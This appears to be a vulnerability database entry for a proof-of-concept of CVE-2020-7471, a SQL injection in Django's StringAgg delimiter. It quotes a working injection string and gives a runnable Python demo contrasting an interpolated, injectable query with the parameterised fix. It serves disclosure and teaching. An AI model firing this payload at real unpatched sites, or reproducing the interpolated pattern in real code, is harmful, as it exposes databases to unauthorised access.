CVE-2020-7471 PoC — Django SQL Injection Vulnerability

Associated Vulnerability
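Title: Django SQL Injection Vulnerability (CVE-2020-7471)
Description: Django is an open-source web application framework written in Python and maintained by the Django Software Foundation. The framework includes an object-relational mapper, a view system, a template system, and more. A SQL injection vulnerability exists in Django 1.11 versions before 1.11.28, 2.2 versions before 2.2.10, and 3.0 versions before 3.0.3. A remote attacker can exploit it with a specially crafted StringAgg delimiter to cause a denial of service, obtain information, or escalate privileges.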
Description
PoC for the SQL injection vulnerability in PostgreSQL with Django, found in Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3
Readme
# CVE-2020-7471-PoC (Django)
PoC for the SQL injection vulnerability in PostgreSQL with Django, found in Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3

The class `django.contrib.postgres.aggregates.StringAgg`, which exposes the PostgreSQL STRING_AGG function, had a SQL injection vulnerability. It is possible to embed an arbitrary query in the value passed to the `delimiter` parameter at initialization.

The query is injected through a form in this Django app.
Query used for SQL injection: `-') AS "mydefinedname" FROM "cve_src_example" GROUP BY "cve_src_example"."label" LIMIT 1 OFFSET 1 -- `
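
The flaw described above, modelled as an added example (not code from this PoC repository or from Django): the first renderer formats the delimiter into the SQL text, the second binds it as a query parameter, which is how the fixed releases handle it. SQLite's `group_concat` stands in for PostgreSQL's `STRING_AGG` so the block runs offline; the `name` column, the sample rows and all function names are assumptions.

```python
import sqlite3

# Constructed rows. The table and "label" column come from the README's query;
# the "name" column is an assumption made for this example.
ROWS = [("a", "x"), ("a", "y"), ("b", "z"), ("c", "w")]

# Delimiter value quoted in the README.
PAYLOAD = ('-\') AS "mydefinedname" FROM "cve_src_example" '
           'GROUP BY "cve_src_example"."label" LIMIT 1 OFFSET 1 -- ')

BASE = ('SELECT "cve_src_example"."label", {agg} AS "mydefinedname" '
        'FROM "cve_src_example" GROUP BY "cve_src_example"."label"')


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE "cve_src_example" (label TEXT, name TEXT)')
    db.executemany('INSERT INTO "cve_src_example" VALUES (?, ?)', ROWS)
    return db


def render_interpolated(delimiter):
    """Pre-fix pattern: the delimiter becomes part of the SQL text."""
    agg = "group_concat(\"cve_src_example\".\"name\", '%s')" % delimiter
    return BASE.format(agg=agg), ()


def render_parameterized(delimiter):
    """Post-fix pattern: the delimiter travels as a bound parameter."""
    agg = 'group_concat("cve_src_example"."name", ?)'
    return BASE.format(agg=agg), (str(delimiter),)


def run(render, delimiter):
    """Render the query, execute it on a fresh database, return (sql, rows)."""
    sql, params = render(delimiter)
    db = make_db()
    try:
        return sql, db.execute(sql, params).fetchall()
    finally:
        db.close()


if __name__ == "__main__":
    for render in (render_interpolated, render_parameterized):
        sql, rows = run(render, PAYLOAD)
        print(render.__name__, len(rows), "row(s)\n ", sql)
```

With the interpolated renderer the closing quote in the delimiter ends the string literal early, so the rest of the value is parsed as SQL and the original tail of the statement is commented out. With the bound parameter the same value is only ever the separator text between aggregated names.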


### Django Version used: Django 3.0.2
### PostgreSQL version used: 9.6.16
File Snapshot

[4.0K] /data/pocs/fa3b59c5e54e776caef94f8cc4db3218db81fac1
├── [ 689] README.md
├── [1.6K] requirements.txt
└── [1.0K] views.py

0 directories, 3 files